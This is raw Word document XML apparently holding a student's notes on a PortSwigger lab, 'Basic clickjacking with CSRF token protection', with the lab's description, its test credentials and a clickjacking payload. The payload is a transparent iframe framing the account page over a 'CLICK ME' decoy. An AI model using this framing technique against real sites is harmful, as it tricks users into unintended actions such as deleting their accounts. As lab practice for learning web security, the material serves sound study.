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562C3" w14:textId="2F8CA6AE" w:rsidR="00F77ED0" w:rsidRDefault="00F77ED0" w:rsidP="00F77ED0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77ED0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab: Basic clickjacking with CSRF token protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4399E7B3" w14:textId="77777777" w:rsidR="00F77ED0" w:rsidRPr="00F77ED0" w:rsidRDefault="00F77ED0" w:rsidP="00F77ED0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682A82DE" w14:textId="77777777" w:rsidR="00F77ED0" w:rsidRPr="00F77ED0" w:rsidRDefault="00F77ED0" w:rsidP="00F77ED0">
      <w:r w:rsidRPr="00F77ED0">
        <w:t>This lab contains login functionality and a delete account button that is protected by a </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00F77ED0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CSRF</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F77ED0">
        <w:t> token. A user will click on elements that display the word "click" on a decoy website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EB690C" w14:textId="77777777" w:rsidR="00F77ED0" w:rsidRPr="00F77ED0" w:rsidRDefault="00F77ED0" w:rsidP="00F77ED0">
      <w:r w:rsidRPr="00F77ED0">
        <w:t>To solve the lab, craft some HTML that frames the account page and fools the user into deleting their account. The lab is solved when the account is deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720EDA01" w14:textId="6715AA61" w:rsidR="00235C41" w:rsidRDefault="00F77ED0">
      <w:r w:rsidRPr="00F77ED0">
        <w:t>You can log in to your own account using the following credentials: wiener:pete</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65123599" w14:textId="77777777" w:rsidR="00DB3C82" w:rsidRDefault="00DB3C82"/>
    <w:p w14:paraId="68F9212F" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387AE8A8" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t xml:space="preserve">    iframe {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3C540A" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t xml:space="preserve">        position:relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B70E9C2" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t xml:space="preserve">        width: 1000px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C4A76B" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t xml:space="preserve">        height: 700px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24579BF3" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t xml:space="preserve">        opacity: 0.1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50067837" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t xml:space="preserve">        z-index: 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233EC600" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3EB6AE" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t xml:space="preserve">    div {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F31265" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t xml:space="preserve">        position:absolute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121576B9" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t xml:space="preserve">        top: 100px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C785C5D" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t xml:space="preserve">        left: 100px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107C4EBA" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t xml:space="preserve">        z-index: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE5017A" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7658DE" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363C3BA7" w14:textId="77777777" w:rsidR="00EA7B7E" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t>&lt;div&gt;CLICK ME&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D61F97" w14:textId="3D2792FE" w:rsidR="00F77ED0" w:rsidRDefault="00EA7B7E" w:rsidP="00EA7B7E">
      <w:r>
        <w:t>&lt;iframe src="https://0acd004304de98aa80cc1720005c001c.web-security-academy.net/my-account?</w:t>
      </w:r>
      <w:r w:rsidR="00154FC8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B5424C" w14:textId="77777777" w:rsidR="00154FC8" w:rsidRDefault="00154FC8" w:rsidP="00EA7B7E"/>
    <w:p w14:paraId="56B25A3D" w14:textId="3A893F1B" w:rsidR="00154FC8" w:rsidRDefault="00154FC8" w:rsidP="00EA7B7E">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/Users/andresariasmedina/Library/Group Containers/UBF8T346G9.ms/WebArchiveCopyPasteTempFiles/com.microsoft.Word/f766f0ee-a9ed-44ba-bb2b-99ac3bc5bfc4"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112CCC" wp14:editId="75F1063D">
            <wp:extent cx="5943600" cy="797560"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="121528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154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4371D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24FC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50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D0"/>
    <w:rsid w:val="00154FC8"/>
    <w:rsid w:val="00235C41"/>
    <w:rsid w:val="006348CE"/>
    <w:rsid w:val="00C2304F"/>
    <w:rsid w:val="00DB3C82"/>
    <w:rsid w:val="00EA7B7E"/>
    <w:rsid w:val="00F7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B3AC5B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{80D75ACA-652A-624A-80D5-D2C82E41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E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E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E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E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E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E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E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E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691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1991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300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4916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ortswigger.net/web-security/cs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Arias Medina</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Andres Felipe Arias Medina</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-20T02:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-20T04:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>